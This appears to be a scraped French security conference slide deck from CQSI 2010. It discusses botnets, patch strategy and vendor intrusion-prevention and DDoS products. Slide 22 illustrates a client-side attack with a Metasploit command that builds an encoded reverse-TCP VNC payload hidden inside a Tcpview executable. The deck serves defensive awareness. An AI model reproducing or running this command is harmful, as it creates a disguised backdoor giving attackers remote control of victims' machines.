Comment les administrateurs de systèmes peuvent ils détecter les pirates info...
Maitriser l'art du kung fu cqsi2010
1. Maîtriser l’art du
Kung-Fu
19 octobre 2010
Colloque québécois de la sécurité de l'information
(CQSI)
Michel Cusin, Architechte Sécurité Bell
Jocelyn Rainville, SE Radware
3. Slide 3
Kung-Fu
Slide 3
• Kung-Fu qui signifie art martial, vient de la nécessité de légitime
défense.
• Les termes "Kung" et "Fu" traduits littéralement et séparément ont une
signification différente:
• "Kung" désigne la "maîtrise", le "perfectionnement".
• "Fu" désigne les techniques en tant que contenu.
Comment se porte votre Kung-Fu en sécurité ?
• Kung-Fu en sécurité -> Maîtrise des techniques en sécurité.
Mais qu’est-ce que le Kung-Fu?
5. Slide 5
Samouraï vs Ninja
Qu’ont-ils en communs?
Ils maîtrisent leur art…
• Ils maîtrisent leurs techniques.
• Ils maîtrisent leurs armes.
• Ils maîtrisent leurs spécialités.
• Ils défendent ce en quoi ils croient.
7. Slide 7
Qu’avons-nous en communs?
• Maîtrise des techniques
• Utilisation des outils
• Connaissances
• Objectifs
Maîtrisons-nous notre art ?
Professionnels de la sécurité vs Pirates
10. Slide 10
Botnet à louer (IMDDOS)
• Botnet « commercial »
•10 000 nouvelles victime par jour
• Propagation (peer-to-peer)
• Windows 7 crack
• Autres noms attrayants
• Portail « libre-service »
• Support 7/24
• Made in China
Source: http://www.damballa.com/IMDDOS/
11. Slide 11
Les Botnets: Le Québec n’y échappe pas
Botnet: RTSS (Réseau de Télécommunication Sociaux Sanitaire)
• Le bot de la St-Valentin (14 Février 2007)
• Le bot était transporté par un ver
• Réseau paralysé
• Au moins l’auteur s’est excusé…
Botnet: Opération Basique
• Février 2008
• Plus de 100 pays sont touchés, sur tous les continents.
• 17 arrestations (de 17 à 26 ans dont 3 mineurs)
• Débût de l’enquête: Été 2006
Source: http://www.sq.gouv.qc.ca/salle-de-presse/communiques/demantelement-reseau-pirates-informatiques-2008.jsp
21. Slide 21
Posez-vous la question
~300
Vulnérabilités découvertes et documentés au cours des 3 dernières années:
~90
~200
Sources: http://nvd.nist.gov/ et http://osvdb.org/
Est-ce que votre stratégie de mise à jour inclue ces produits? Vraiment…?
22. Slide 22
Scénario d’un “client-side attack”
Connexion en sortie:
Port TCP 80 (HTTP)
ou 443 (HTTPS)
DefensePro
Serveur
Victime
Coupe-feuPirate
Environnement corporatif
VNCINJECT:
./msfpayload windows/vncinject/reverse_tcp LHOST=10.0.0.10
LPORT=443 R | ./msfencode -c 5 -e x86/shikata_ga_nai -x
/home/Tcpview.exe -t exe > rev_vnc.exe
23. IPS: Protection par signatures statiques
• Procure une protection contre:
– Vers, Bots, Trojans, Hameçonage,
logiciels espions
– Web, courriel, SQL, VoIP (SIP),
vulnérabilités DNS
– Proxy anonymiseur, attaques IPv6
– Vulnérabilités Microsoft
– Anomalies de protocol
• Protection par signatures:
– Équipe de pointe de recherche en
sécurité
– Protection contre l’exploitation des
vulnérabilités connues
– Mise à jour hebdomadaire et
d’urgence des signatures
Slide 23
24. Protection DDoS : Signatures en temps réel
• Protection par signature créées automatiquement en temps réel contre
les attaques DDoS réseau:
– SYN floods;
– TCP floods;
– UDP/ICMP floods.
• Proposition de valeur
– Maintiens de la disponibilité des applications critiques, même durant les
attaques;
– Blocage des attaques sans bloquer le trafic des utilisateurs légitimes;
– Protection automatique en temps réel contre les inondations réseau (floods)
sans nécessiter d'intervention humaine.
Slide 24
25. Network Behavioral Analysis: Real-time Signatures Protection
• L’Analyse Comportementale Réseau (NBA - Network behavioral
analysis) détecte les transactions anormales au niveau des utilisateurs
ainsi que des applications.
• Protection par signatures automatiques en temps réel contre:
– Propagation de logiciel malveillant “Zéro-minute”
– Mauvaise utilisation des ressources d’applications comme:
• Attaques de type “Brute force”
• Balayages d’application Web
• Inondations (floods) de page HTTP
• Balayages SIP
• Inondations (flood) SIP
• Proposition de valeur
– Maintiens de la disponibilité des applications critiques, même durant les
attaques;
– Blocage des attaques sans bloquer le trafic des utilisateurs légitimes;
– Protection automatique en temps réel contre les inondations réseau (floods)
sans nécessiter d'intervention humaine.
Slide 25
26. Slide 26
Une question d’équilibre
Conclusion
C’est une question d’équilibre
ConnaissancesTechnologies
27. Slide 27
Questions?
La présentation sera disponible sur le site du CQSI ainsi que sur http://cusin.ca
Questions?
Coupon pour le tirage d’une formation SANS gratuite en français:
Détection de pirates informatiques pour administrateurs de systèmes
Info sur http://www.sans.org et sur http://cusin.ca